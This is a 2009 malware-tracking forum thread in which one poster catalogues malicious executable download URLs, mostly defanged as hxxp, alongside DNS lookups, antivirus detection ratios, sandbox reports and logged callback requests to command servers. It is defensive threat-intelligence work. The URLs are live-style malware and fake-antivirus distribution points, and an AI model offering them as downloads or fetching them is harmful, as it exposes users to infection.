Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 25, 2009, 06:27:38 pm
Code: [Select]
hxxp://lilj.us/abcd.exe

$ dig lilj.us +short
222.186.25.28

http://www.virustotal.com/analisis/ad96d64bf1f121f10f4fd35e3c54479a 15/40

http://www.malwaredomainlist.com/mdl.php?search=222.186.25&colsearch=All&quantity=50
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 25, 2009, 06:31:35 pm
Code: [Select]
hxxp://av4321.us/abc/av1.0.exe

$ dig av4321.us +short
66.90.74.9

http://www.virustotal.com/analisis/ea100eeb0c59bfd2d7c4d7c9509e09d5 35/39
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 25, 2009, 06:36:38 pm
Code: [Select]
hxxp://qvod.xxoo888.cn/dddxxx/qvod.exe

$ dig qvod.xxoo888.cn +short
121.12.104.205

http://www.virustotal.com/analisis/c8b56aacd8f4161d93efb308add112c5 29/39
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 25, 2009, 06:43:11 pm
Code: [Select]
hxxp://www.10nnn.com/qvod.exe

$ dig www.10nnn.com +short
10nnn.com.
61.160.216.155
$ dig 10nnn.com +short
61.160.216.155

http://www.virustotal.com/analisis/440d839e36f2b73cb8b9d479e64d8f19  30/39
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 27, 2009, 02:24:35 pm
Code: [Select]
hxxp://62.4.83.201/main/logo.html?sid=RB2rGHFbp0MjDfoYcQSvHnEP-R5zBP1MJl-9TiBZ-UJ9BZ1aJgSmSXQLrEh2Dq0fdAz7HyRb-Rh0C6ZIdQX5HCNb_RxGO65MfA_vQkE3rkhxDadJfQumS0A5rEp1Dpl4dAiYfiJRrUhNOK5LcAumc0xT9B10Da9KdQU

http://www.virustotal.com/analisis/46dbc11ed929e1ad72ed79d32040037d 9/40

http://anubis.iseclab.org/?action=result&task_id=1580e69e0407b945481b6219dd0613030&format=html
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 27, 2009, 03:31:54 pm
Code: [Select]
[code
hxxp://dwnld.pc-promooffer.com/secure/379eb8449916f24b777a6784a4ba51e4/49f5c295/srm/srm_free_setup.exe

$ dig dwnld.pc-promooffer.com +short
78.47.127.10
78.46.148.49

http://www.virustotal.com/analisis/0dfb56e3f3f25f1919aafc77bda1ac7d 19/39
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 28, 2009, 02:24:52 pm
Code: [Select]
hxxp://173.169.189.125/pid=1000/setup.exe

http://www.virustotal.com/analisis/a4781e17148f0662515612e71851c78c 15/40

http://anubis.iseclab.org/?action=result&task_id=13f768dc80806c754a19a5f9d9c5b02e5&format=html
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 28, 2009, 02:55:37 pm
Code: [Select]
hxxp://redir2404.com/go/fb.php?domain=webxtreme.evolink.ro

$ dig redir2404.com +short
119.110.107.137

results in download
Code: [Select]
hxxp://124.43.65.207/pid=1000/setup.exe


http://wepawet.iseclab.org/view.php?hash=faf2326b1176b66b8fd7a3d988434473&t=1240930709&type=js

http://www.malwaredomainlist.com/mdl.php?search=119.110.107&colsearch=All&quantity=50
Title: Re: Mr Clean's dirt
Post by: RS-232 on April 28, 2009, 03:49:10 pm
Quote
hxxp://redir2304.com/go/
hxxp://75.64.142.189/pid=1000/?ch=&ea=

Quote
hxxp://redir1504.com/go/
hxxp://83.250.135.184/pid=1000/?ch=&ea=

Quote
hxxp://y18032009.com/go/
hxxp://116.197.197.174/pid=1000/?ch=&ea=

hxxp://y18032009.com/the/?pid=1
hxxp://79.117.132.89/pid=1/

hxxp://y18032009.com/the/?pid=2
hxxp://99.34.223.88/pid=2/

hxxp://y18032009.com/the/
hxxp://70.212.211.229/pid=6004/

...different input parameter,different ip returned etc etc...
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 28, 2009, 07:42:46 pm
Code: [Select]
hxxp://antivirus-powerful-scanv2.com/download/Install_2004.exe

$ dig antivirus-powerful-scanv2.com +short
78.47.91.153
38.99.170.209
94.102.48.28

http://www.virustotal.com/analisis/eda559c9f7cc99590498d64c240f1045 1/40

http://anubis.iseclab.org/?action=result&task_id=1206f1eaf694a94143d5827bef1982575&format=html
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 29, 2009, 01:15:28 am
Code: [Select]
hxxp://files.loads-archive-top-av.com/normal/setup_1_2_1.exe

$ dig files.loads-archive-top-av.com +short
loads-archive-top-av.com.
195.88.80.127
$ dig loads-archive-top-av.com +short
195.88.80.127

http://www.virustotal.com/analisis/79fa8309e88dff1b8004d476aceea5b1 5/39

http://anubis.iseclab.org/?action=result&task_id=197101fbfd88faa54d14ac954efeddd6a&format=html


Code: [Select]
From ANUBIS:1032 to 64.191.64.246:80 - [int.sysproreport1.com]
Request: GET /stat.php?func=installrun&id=1&landing=-1&lang=EN&sub=1
Response: 200 "OK"
From ANUBIS:1033 to 195.88.81.12:80 - [dl.antispy-scan-4freee.com]
Request: HEAD /get/?pin=0&lnd=0&type=main
Response: 200 "OK"



Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 29, 2009, 04:31:19 pm
Code: [Select]
hxxp://piccubes.com.softwarescaninc.com/downloads/slideshows.exe

$ dig piccubes.com.softwarescaninc.com +short
98.126.32.34

http://www.virustotal.com/analisis/a9094f392cc6c104cd1d8099085d088e 10/39
http://anubis.iseclab.org/?action=result&task_id=1e9ce7be7f540b1444177029db10a7cb2&format=html
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 29, 2009, 05:48:51 pm
Code: [Select]
hxxp://www.gaoqiong.com/js.exe

$ dig www.gaoqiong.com +short
125.46.58.23

http://www.virustotal.com/analisis/035776328497528c46bc51a0be2b29af 8/40
http://anubis.iseclab.org/?action=result&task_id=1d1b10ec3af1d7894dd459b1ba58d47df&format=html
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 29, 2009, 07:11:18 pm
Code: [Select]
hxxp://uplcodecset3.com/codec/119.exe

$ dig uplcodecset3.com +short
194.165.4.77

http://www.virustotal.com/analisis/a5548a0bfc9a73609f371f47908275bb 16/39
http://anubis.iseclab.org/?action=result&task_id=1f2d731c545b6ef44e55786c574615aaa&format=html

Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 29, 2009, 10:18:01 pm
Code: [Select]
hxxp://sp-files.com/download/305a533539773d3dbe4603cd/video.exe

$ dig sp-files.com +short
91.212.65.19

http://www.virustotal.com/analisis/f24f3a6c8775c05ae07ab938f21ff388 7/40
http://anubis.iseclab.org/?action=result&task_id=1c07cd0b741bd782455fdc1976543e134&format=html

Code: [Select]
-  HTTP Conversations: 
From ANUBIS:1032 to 91.212.65.17:80 - [91.212.65.17]
Request: POST /cgi-bin/generator
Response: 200 "OK"

bad neighbourhood
http://www.malwaredomainlist.com/mdl.php?search=91.212.65&colsearch=All&quantity=50

Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 30, 2009, 07:47:36 pm
Code: [Select]
hxxp://youtubealert.com/setup.exe

$ dig youtubealert.com +short
193.33.61.225

http://www.virustotal.com/analisis/5434b6435428ba5fb55d2e801db764db 15/40

bad neighbourhood
http://www.malwaredomainlist.com/mdl.php?search=193.33.61&colsearch=All&quantity=50

http://anubis.iseclab.org/?action=result&task_id=16dae2409b8729464c57152e725fb0f67&format=html


per anubis, phones home to:

15.6b53ec12a69eae40af18b20d429351ac.m20003.gl22.0.-.261.0.-.0.180853.uroledup.com

IP = 85.12.43.103


Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 30, 2009, 08:56:25 pm
Code: [Select]
hxxp://1spywareonlinescanner.com/download/Install_2010-1.exe

$ dig 1spywareonlinescanner.com +short
93.174.93.34
78.47.91.153
38.99.170.209

http://www.virustotal.com/analisis/7a37adaee924f2dff6f4acd2f8a5f5c6 1/40

http://anubis.iseclab.org/?action=result&task_id=1ee3788f547f76ad4ad0abf428d3daca7&format=html

from anubis
Code: [Select]
-  HTTP Conversations: 
From ANUBIS:1033 to 207.46.21.124:80 - [update.microsoft.com]
Request: GET /windowsupdate/v6/thanks.aspx
Response: 200 "OK"
From ANUBIS:1034 to 83.133.123.140:80 - [securedliveuploads.com]
Request: GET /?act=fb&1=0&2=1192706791&3=kfddnffaffihlcoemdkedcaefcfaffedhfmdmbpc&4=eebajfjafekaifnbddghoclg&5=20&6=4&7=31&8=95&9=0&10=11-18
Response: 200 "OK"
Title: Re: Mr Clean's dirt
Post by: Mr Clean on May 01, 2009, 01:55:48 pm
Code: [Select]
hxxp://1bestprotectionscanner.com/download/Install_2004.exe

$ dig 1bestprotectionscanner.com +short
78.47.91.153
93.174.93.34
38.99.170.209

http://www.virustotal.com/analisis/06f3fc3578f2f178af7434a59344a3a2 4/40
http://anubis.iseclab.org/?action=result&task_id=115ace46280388df415adacefd25b6b4e&format=html


38.99.170.209   Canada  Psinet Inc                                                                                                     
http://www.malwaredomainlist.com/mdl.php?search=38.99.170&colsearch=All&quantity=50
                                         
78.47.91.153    Germany Siarhei Shandrokha      static.153.91.47.78.clients.your-server.de.     
http://www.malwaredomainlist.com/mdl.php?search=78.47.91&colsearch=All&quantity=50

93.174.93.34    Netherlands     As29073 Ecatel Ltd                                                                                     
http://www.malwaredomainlist.com/mdl.php?search=93.174.93&colsearch=All&quantity=50
Title: Re: Mr Clean's dirt
Post by: Mr Clean on May 03, 2009, 01:12:03 am
Code: [Select]
hxxp://updateyoursecurity.com/download.php?affid=00000

$ dig updateyoursecurity.com +short
209.44.126.241

http://www.virustotal.com/analisis/f1b29b992c9d6b0d9aae71da5bd788df 12/41

http://anubis.iseclab.org/?action=result&task_id=171ee220f1c7e1274d578e29fffd501c5&format=html

http://www.malwaredomainlist.com/mdl.php?search=209.44.126&colsearch=All&quantity=50
Title: Re: Mr Clean's dirt
Post by: Mr Clean on May 03, 2009, 06:12:23 pm
Code: [Select]
hxxp://1quickpcscanner.com/download/Install_2004.exe

$ dig 1quickpcscanner.com +short
78.47.91.153
94.102.48.28
38.99.170.209

http://www.virustotal.com/analisis/85c5bd1ee852acadf7e9cdf07ccf571a 3/41

http://anubis.iseclab.org/?action=result&task_id=1e53ee6b6dd63b184010d1895dd97bbd2&format=html

38.99.170.209   Canada  Psinet Inc                                                                                                                       
http://www.malwaredomainlist.com/mdl.php?search=38.99.170&colsearch=All&quantity=50

78.47.91.153    Germany Siarhei Shandrokha      static.153.91.47.78.clients.your-server.de.
http://www.malwaredomainlist.com/mdl.php?search=78.47.91&colsearch=All&quantity=50

94.102.48.28    Netherlands     As29073 Ecatel Ltd                                                                                                       
http://www.malwaredomainlist.com/mdl.php?search=94.102.48&colsearch=All&quantity=50
Title: Re: Mr Clean's dirt
Post by: Mr Clean on May 04, 2009, 02:05:37 pm
Code: [Select]
hxxp://xtube-xmovie.com/promo3/?aid=1361&vname=antivirus

$ dig xtube-xmovie.com +short
78.129.166.166

http://wepawet.iseclab.org/view.php?hash=016fce1f9262311a3bc83f57bdc3f1bb&t=1241445682&type=js
http://www.virustotal.com/analisis/c953a2358db9bd95278405789f0be7cf 13/40

birds of a feather....
http://www.malwaredomainlist.com/mdl.php?search=78.129.166&colsearch=All&quantity=50
Title: Re: Mr Clean's dirt
Post by: Mr Clean on May 04, 2009, 04:08:54 pm
Code: [Select]
hxxp://socialsecurityscan.com/download.php?affid=17000

$ dig socialsecurityscan.com +short
209.44.126.22

http://wepawet.iseclab.org/view.php?hash=24eaf4de29f605df06fe309e287cfc3e&t=1241453591&type=js
http://www.virustotal.com/analisis/b483e50dfa48b0e6bc26c2c67ed57540 22/40
http://anubis.iseclab.org/?action=result&task_id=1f19550b52e48abc4e9f66202f2c24d81

known bad rep
http://www.malwaredomainlist.com/mdl.php?search=209.44.126&colsearch=All&quantity=50

Title: Re: Mr Clean's dirt
Post by: Mr Clean on May 05, 2009, 12:43:23 pm
Code: [Select]
hxxp://scanner-av-fast.com/11042/3/

$ dig scanner-av-fast.com +short
64.69.32.220

http://wepawet.iseclab.org/view.php?hash=39d61eb8c8986cf16079dbf6a8f0747a&t=1241528023&type=js


Code: [Select]
hxxp://files.load-best-file-arhive.com/normal/setup_11042_3_1.exe

$ dig files.load-best-file-arhive.com +short
load-best-file-arhive.com.
195.88.80.127
$ dig load-best-file-arhive.com +short
195.88.80.127

http://www.virustotal.com/analisis/b3ab977ceb9b48b91664f3e9ea5327f5 6/40
http://anubis.iseclab.org/?action=result&task_id=1a683d6df1cf4fa040da34fa4e3023743


Code: [Select]
-  HTTP Conversations: 
From ANUBIS:1032 to 64.191.64.246:80 - [int.sysproreport1.com]
Request: GET /stat.php?func=installrun&id=11042&landing=-1&lang=EN&sub=1
Response: 200 "OK"
From ANUBIS:1033 to 195.88.81.12:80 - [dl.antispy-scan-4freee.com]
Request: HEAD /get/?pin=0&lnd=0&type=main
Response: 200 "OK"

195.88.80.127   Latvia  Sia Teron                                                                                                                   
http://www.malwaredomainlist.com/mdl.php?search=195.88.80&colsearch=All&quantity=50
Title: Re: Mr Clean's dirt
Post by: Mr Clean on May 06, 2009, 12:39:27 am
Code: [Select]
hxxp://www.clunk.biz/screensavers/CoolScreenSaver.exe

$ dig www.clunk.biz +short
clunk.biz.
69.41.243.34
$ dig clunk.biz. +short
69.41.243.34

http://www.virustotal.com/analisis/331729f3740391635d31e77acffa55d5  13/39
Title: Re: Mr Clean's dirt
Post by: Mr Clean on May 06, 2009, 05:13:21 pm
Code: [Select]
hxxp://antivirusbestscannerv1.com/download/Install_2006-40.exe

$ dig antivirusbestscannerv1.com +short
94.102.48.28
78.47.91.153
94.76.212.239
69.4.230.204
212.117.165.126

http://www.virustotal.com/analisis/470fb529226ecfc1efbcd87daf68f6d2 2/40
http://anubis.iseclab.org/?action=result&task_id=1288e8a4c4bb1681425f19f54617f832a&format=html

momentstohaveyou.cn per anubis
Code: [Select]
-  HTTP Conversations: 
From ANUBIS:1034 to 65.55.13.91:80 - [update.microsoft.com]
Request: GET /windowsupdate/v6/thanks.aspx
Response: 200 "OK"
From ANUBIS:1035 to 83.133.123.140:80 - [momentstohaveyou.cn]
Request: GET /?act=fb&1=0&2=1192706791&3=kfddnffaffihlcoemdkedcaefcfaffedhfmdmbpc&4=eebajfjafekaifnbddghoclg&5=20&6=4&7=31&8=95&9=0&10=11-18
Response: 200 "OK"


69.4.230.204   United States   Hosting Services Inc   iad2-virt5.liquidgravity.com.
http://www.malwaredomainlist.com/mdl.php?search=69.4.230&colsearch=All&quantity=50

78.47.91.153   Germany   Siarhei Shandrokha   static.153.91.47.78.clients.your-server.de.
http://www.malwaredomainlist.com/mdl.php?search=78.47.91&colsearch=All&quantity=50

94.76.212.239   United Kingdom   Eukhost Customer Server   94-76-212-239.static.as29550.net.
http://www.malwaredomainlist.com/mdl.php?search=94.76.212&colsearch=All&quantity=50

94.102.48.28   Netherlands   As29073 Ecatel Ltd   
http://www.malwaredomainlist.com/mdl.php?search=94.102.48&colsearch=All&quantity=50

212.117.165.126   Luxembourg   Root Esolutions   ip-212-117-165-126.server.lu.
http://www.malwaredomainlist.com/mdl.php?search=212.117.165&colsearch=All&quantity=50
Title: Re: Mr Clean's dirt
Post by: Mr Clean on May 07, 2009, 01:57:37 pm
Code: [Select]
hxxp://pyrisiman.com/image/qaze.php

$ dig pyrisiman.com +short
212.95.55.135

http://www.virustotal.com/analisis/d51e723d708ca93455ad7f10bf8cab14 10/42

http://wepawet.iseclab.org/view.php?hash=6f69feb1e6b2bbd01a4967ecaf391115&t=1241704447&type=js

http://anubis.iseclab.org/?action=result&task_id=1f08b0f7365b71b94698e69623203719a&format=html
Title: Re: Mr Clean's dirt
Post by: Mr Clean on May 11, 2009, 02:14:02 pm
http://ccd.jd2g.com/down/20/fz.txt

Code: [Select]
hxxp://u9.ovfr6.com/sbb/20/ko.exe
hxxp://u1.ovfr6.com/laa/L1.exe
hxxp://u1.ovfr6.com/laa/L3.exe
hxxp://u1.ovfr6.com/laa/L7.exe
hxxp://u1.ovfr6.com/laa/L8.exe
hxxp://u1.ovfr6.com/laa/L9.exe
hxxp://u1.ovfr6.com/laa/L2.exe
hxxp://u3.ovfr6.com/lmm/M39.exe
hxxp://u3.ovfr6.com/lmm/M38.exe
hxxp://u3.ovfr6.com/lmm/M23.exe
hxxp://u3.ovfr6.com/lmm/M5.exe
hxxp://u3.ovfr6.com/lmm/M25.exe
hxxp://u3.ovfr6.com/lmm/M4.exe
hxxp://u3.ovfr6.com/lmm/M01.exe
hxxp://u2.ovfr6.com/lmm/S10.exe
hxxp://u2.ovfr6.com/lmm/S8.exe
hxxp://u2.ovfr6.com/lmm/S1.exe
hxxp://u2.ovfr6.com/lmm/S2.exe
hxxp://u2.ovfr6.com/lmm/S12.exe
hxxp://u2.ovfr6.com/lmm/S14.exe
hxxp://u2.ovfr6.com/lmm/S15.exe
hxxp://u2.ovfr6.com/lmm/S16.exe
hxxp://u2.ovfr6.com/lmm/S21.exe
hxxp://u2.ovfr6.com/lmm/S01.exe
hxxp://u3.ovfr6.com/lmm/M33.exe
hxxp://u3.ovfr6.com/lmm/M37.exe
hxxp://u3.ovfr6.com/lmm/M15.exe
hxxp://u3.ovfr6.com/lmm/M24.exe
hxxp://u3.ovfr6.com/lmm/M02.exe
hxxp://u2.ovfr6.com/lmm/S13.exe
hxxp://u2.ovfr6.com/lmm/S17.exe
hxxp://u2.ovfr6.com/lmm/S20.exe
hxxp://u2.ovfr6.com/lmm/S11.exe
hxxp://u2.ovfr6.com/lmm/S02.exe
hxxp://u9.ovfr6.com/cjj/a1.exe
hxxp://u9.ovfr6.com/cjj/a2.exe
hxxp://u9.ovfr6.com/cjj/a8.exe
hxxp://u9.ovfr6.com/cjj/a6.exe
hxxp://u9.ovfr6.com/cjj/a9.exe
hxxp://u9.ovfr6.com/cjj/a10.exe
hxxp://u9.ovfr6.com/cjj/sb2.exe

u1.ovfr6.com
u2.ovfr6.com
u3.ovfr6.com
u9.ovfr6.com
ccd.jd2g.com
Title: Re: Mr Clean's dirt
Post by: Mr Clean on May 11, 2009, 05:59:10 pm
Code: [Select]
hxxp://adsmaster.org/top/Mzk3MDExNzkyXnc6MjE=

$ dig adsmaster.org +short
74.200.90.72


Code: [Select]
SRC: GET /top/Mzk3MDExNzkyXnc6MjE= HTTP/1.1
SRC: Accept: */*
SRC: UA-CPU: x86
SRC: Accept-Encoding: gzip, deflate
SRC: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
SRC: Host: adsmaster.org
SRC: Connection: Keep-Alive
SRC:
SRC:
DST: HTTP/1.1 200 OK
DST: Date: Mon, 11 May 2009 17:03:23 GMT
DST: Server: Apache/1.3.41 (Unix) PHP/4.4.9 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8b
DST: X-Powered-By: PHP/4.4.9
DST: Cache-Control: no-store, no-cache, must-revalidate
DST: Pragma: no-cache
DST: Accept-Ranges: bytes
DST: Content-Length: 8322
DST: Content-Disposition: inline; filename=setup.exe
DST: Keep-Alive: timeout=2, max=99
DST: Connection: Keep-Alive
DST: Content-Type: application/octet-stream
DST:
DST: MZ......................@...................................|...........!..L.!This program cannot be run in DOS mode.
DST:
DST: $...PE..L...b..I............................y.P......0....@...........................P..........


http://www.virustotal.com/analisis/c263d8ba1a4bad709d2b1e98877f283d 11/40

http://anubis.iseclab.org/?action=result&task_id=1c23a49fc7ea7ae84c5803268c9ddae8f&format=html

Code: [Select]
-  HTTP Conversations: 
From ANUBIS:1033 to 74.200.90.72:80 - [adsmaster.org]
Request: GET /top/mpr/7777.php?w=5
Response: 200 "OK"
Request: GET /top/mpr/7777.php?w=6
Response: 200 "OK"
Request: GET /top/mpr/7777.php?w=7
Response: 200 "OK"
Request: GET /top/mpr/7777.php?w=8
Response: 200 "OK"
From ANUBIS:1036 to 69.65.96.217:80 - [traffbaza.com]
Request: GET /setfile/files/ckMa.jpg
Response: 200 "OK"


Code: [Select]
hxxp://traffbaza.com/setfile/files/ckMa.jpg

$ file ckMa.jpg
ckMa.jpg: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

$ dig traffbaza.com +short
69.65.96.217

http://www.virustotal.com/analisis/8be32db39ce16a0683afde3d35476e6f 23/40
Title: Re: Mr Clean's dirt
Post by: Mr Clean on May 12, 2009, 09:02:02 pm
Code: [Select]
hxxp://eurorem2009.ru/avi.exe

$ dig eurorem2009.ru +short
61.235.117.88

http://www.virustotal.com/analisis/d38acffe6a65f4ea33044506e3f2040f 12/40

http://anubis.iseclab.org/?action=result&task_id=1b07a879cd97ef814a541b8425dd4a2bf&format=html

http://www.malwaredomainlist.com/mdl.php?search=61.235.117&colsearch=All&quantity=50


Title: Re: Mr Clean's dirt
Post by: Mr Clean on May 14, 2009, 12:30:05 pm
Code: [Select]
hxxp://downloadsshare.com/IstallSoftware.exe

$ dig downloadsshare.com +short
118.126.4.86

http://www.virustotal.com/analisis/cc9ae8567d8560630a954a8c20af9054 19/41
http://anubis.iseclab.org/?action=result&task_id=191485f2eefdc8d24b166c7a7ba4d055e&format=html

http://www.malwaredomainlist.com/mdl.php?search=118.126.4&colsearch=All&quantity=50
Title: Re: Mr Clean's dirt
Post by: Mr Clean on May 14, 2009, 12:34:18 pm
Code: [Select]
hxxp://turuwiando.com/cn.php?yym

$ dig turuwiando.com +short
200.63.45.34


http://wepawet.iseclab.org/view.php?hash=cc4694a68108a7e830048c2bedf58a93&t=1242304488&type=js
http://www.virustotal.com/analisis/725b3a1b963076ce07219bdf4062eab3 10/39
http://anubis.iseclab.org/?action=result&task_id=100a120738fbdabd4055c1f845d339b49&format=html

http://www.malwaredomainlist.com/mdl.php?search=200.63.45&colsearch=All&quantity=50
Title: Re: Mr Clean's dirt
Post by: Mr Clean on May 18, 2009, 04:01:21 pm
Code: [Select]
[code
192.168.3.3 - - [18/May/2009:15:50:12 +0000] "GET hxxp://countbiz.com/download/6f3949614b673d3dc0e725f1/adobe_flash_player_v10.0.22.87.exe HTTP/1.0" - - "hxxp://jensblog.neverseen.net/player.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"



Code: [Select]
hxxp://countbiz.com/download/6f3949614b673d3dc0e725f1/adobe_flash_player_v10.0.22.87.exe

$ dig countbiz.com +short
91.212.65.19

http://www.virustotal.com/analisis/2db34a7496057715784c4a31826f7e60 7/40

http://www.malwaredomainlist.com/mdl.php?search=91.212.65&colsearch=All&quantity=50
Title: Re: Mr Clean's dirt
Post by: Mr Clean on May 20, 2009, 12:36:55 pm
Code: [Select]
10.1.0.217 - - [20/May/2009:00:33:21 +0000] "GET http://duplozavr.com/codec/181.exe HTTP/1.1" - - "http://werulezz.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"

$ dig werulezz.com +short
174.36.243.5
$ dig duplozavr.com +short
194.165.4.77

http://www.virustotal.com/analisis/64fd55f12d2d23b7b8e84f33bfa790c8 25/40
http://anubis.iseclab.org/?action=result&task_id=19f9eb0a1e8e06614b1731da93e93c346&format=html


duplozavr.com
werulezz.com
Title: Re: Mr Clean's dirt
Post by: Mr Clean on May 20, 2009, 02:58:39 pm
Code: [Select]
hxxp://bgukeumzwz.net/ak1.exe

$ dig bgukeumzwz.net +short
195.2.253.241

http://www.virustotal.com/analisis/1ca5be9c31c21e96c316fd1fed3050c1 9/40

http://anubis.iseclab.org/?action=result&task_id=1ce99aa259fa4bd34e974c501b7ad52eb&format=html

domain ctfwin.com from anubis analysis

Code: [Select]
-  HTTP Conversations: 
From ANUBIS:1034 to 69.46.25.35:80 - [ctfwin.com]
Request: GET /cd/un1.php?id=1C8B9A6E2FB90CA&ver=d10
Response: 302 "Found"
Request: GET /cd/cd.php?id=1C8B9A6E2FB90CA&ver=d11
Response: 200 "OK"
Request: GET /cd/cd.php?id=1C8B9A6E2FB90CA&ver=d10
Response: 200 "OK"
Title: Re: Mr Clean's dirt
Post by: Mr Clean on May 20, 2009, 09:07:41 pm
Code: [Select]
hxxp://www.sex-like.com/gif.exe

$ dig www.sex-like.com +short
125.46.58.23

http://www.virustotal.com/analisis/064ed991bdd55a356ce81af920f599ad  13/38

http://anubis.iseclab.org/?action=result&task_id=12ddf96468edba4c4edc7b73cdc600b05&format=html

Title: Re: Mr Clean's dirt
Post by: Mr Clean on May 22, 2009, 12:30:00 pm
Code: [Select]
http://worldtube.su/index.php?q=Shawn-Johnson-sextape

$ dig worldtube.su +short
213.182.197.8

http://www.malwaredomainlist.com/mdl.php?search=213.182.197&colsearch=All&quantity=50

the above page has a direct link to this:

Code: [Select]
hxxp://shotgol.com/download/6c72705a4e673d3d68b518b720090516/ActiveXsetup.exe

$ dig shotgol.com +short
91.212.65.19

http://www.virustotal.com/analisis/41284e426c75c6caec8d592d0678750051d68008594f86ec1b02dc010cd8d601-1242993781  14/40
http://anubis.iseclab.org/?action=result&task_id=1787ba9db26851104a5bfdf2280c3e532&format=html
http://www.malwaredomainlist.com/mdl.php?search=91.212.65&colsearch=All&quantity=50



worldtube.su
shotgol.com


Title: Re: Mr Clean's dirt
Post by: Mr Clean on May 22, 2009, 10:40:05 pm
Code: [Select]
hxxp://mediapass.trueads.biz/generic/en/access.exe

$ dig mediapass.trueads.biz +short
85.92.152.43

http://www.virustotal.com/analisis/22327a0a8b064be7fb1c472818531a558a52a4aac3d8ad9f362db863beca17bf-1243030064 0/40
http://anubis.iseclab.org/?action=result&task_id=16ae32b3dbad80ff4613a409cfe2552c0&format=html
http://www.threatexpert.com/report.aspx?md5=5e4f487464bea6bc3bf63927342d9d63

http://threatexpert.com/reports.aspx?find=trueads.biz

trueads.biz
Title: Re: Mr Clean's dirt
Post by: Mr Clean on June 02, 2009, 10:27:40 pm
Code: [Select]
hxxp://freesecurityonline.com/download.php?affid=00202 HTTP/1.1


$ dig freesecurityonline.com +short
209.44.126.36

http://wepawet.iseclab.org/view.php?hash=99acfdaeca9700a23960f8ab3f630318&t=1243982479&type=js

http://www.virustotal.com/analisis/054436dce8d78b967bc56f8c1ed3bc19041f36b1ed129e069a7bf9ff843be722-1243981754 6/35

http://anubis.iseclab.org/?action=result&task_id=1d3137c2313497a94492418f42f0eaf1d

http://www.malwaredomainlist.com/mdl.php?search=209.44.126&colsearch=All&quantity=50


freesecurityonline.com
Title: Re: Mr Clean's dirt
Post by: Mr Clean on June 04, 2009, 02:44:04 pm
Code: [Select]
hxxp://check-viruses.com/scan_now.exe

$ dig check-viruses.com +short
67.212.81.29

http://wepawet.iseclab.org/view.php?hash=b3f9781d15b717c9f77ea0420daeecb8&t=1244126963&type=js
http://www.virustotal.com/analisis/cd491729d718b90a2fcdc1ec5a87769bc7210864ae23e35aeff098073c7ce476-1244125982 1/40
http://anubis.iseclab.org/?action=result&task_id=1c4f6a99d3e0c8434cd135c8975d909dc&format=html

check-viruses.com
Title: Re: Mr Clean's dirt
Post by: Mr Clean on June 04, 2009, 05:02:53 pm
Code: [Select]
hxxp://www.tommti-systems.de/main-Dateien/TOOLS/dontlinkthefile_3danalyzer-v236.exe

$ dig www.tommti-systems.de +short
82.165.104.223

http://www.virustotal.com/analisis/eedfb2648b10b943c2c08c64216f8ddf122507c52e068a654dcfb2ba92b3bd51-1244056455 2/40

http://anubis.iseclab.org/?action=result&task_id=1a78d7660ad860ed40d1d67337243014c&format=html

Title: Re: Mr Clean's dirt
Post by: Mr Clean on June 09, 2009, 05:12:15 pm
Code: [Select]
hxxp://evidek.ro/1/pdrv.exe

$ dig evidek.ro +short
86.35.15.212

http://www.virustotal.com/analisis/64d8a55d1473741dfba72090b3048b14ec3285f9c4937b4f1e1110770a59f82b-1244567216 2/39

http://anubis.iseclab.org/?action=result&task_id=1cbaf1fb8ff980d84bd7fe7cc6c449c88&call=first

Code: [Select]
hxxp://evidek.ro/1/pp.10.exe

http://www.virustotal.com/analisis/bb28c24fd8f7e2d4691653b6acdbada71f3f63c9b42a0019748f812dced8af8a-1244567252 25/40

http://anubis.iseclab.org/?action=result&task_id=1684aaa9ec3053434fd5541c7352de0d8


evidek.ro

Title: Re: Mr Clean's dirt
Post by: Mr Clean on June 17, 2009, 03:53:07 pm
Code: [Select]
hxxp://w-crook.com.ar/report_8977.exe

$ dig w-crook.com.ar +short
174.132.180.99


hxxp://scananida.com.pl/report_8977.exe

$ dig scananida.com.pl +short
91.121.8.196

http://www.virustotal.com/analisis/8e6cfb980d4a6a364ce714244f761d2c056c57688908e3d8e263d4fd119043ba-1245252516 2/40

Threat characteristics of ZBot
http://www.threatexpert.com/report.aspx?md5=d4e6069285270e41ef470d897cf26e36

w-crook.com.ar
scananida.com.pl
Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 01, 2009, 12:38:38 pm
Code: [Select]
hxxp://www.qiqijs.com/gm/gm.exe

$ dig www.qiqijs.com +short
65.60.6.36

http://www.virustotal.com/analisis/cd1bfd9fdcd2adc67fb6c7d7e8d8f2c552de46f4b021d5b8d24151766f6009e4-1246262154 7/40
http://anubis.iseclab.org/?action=result&task_id=178feb1afefc2c694e1efc6e8f7e71917&format=html
http://www.malwaredomainlist.com/mdl.php?search=65.60.6&colsearch=All&quantity=50


from anubis analysis
Code: [Select]
-  HTTP Conversations: 
From ANUBIS:1035 to 74.222.12.98:80 - [www.edulands.com]
Request: GET /good.gif
Response: 200 "OK"
From ANUBIS:1036 to 63.223.125.17:80 - [www.toptravelsinfo.com]
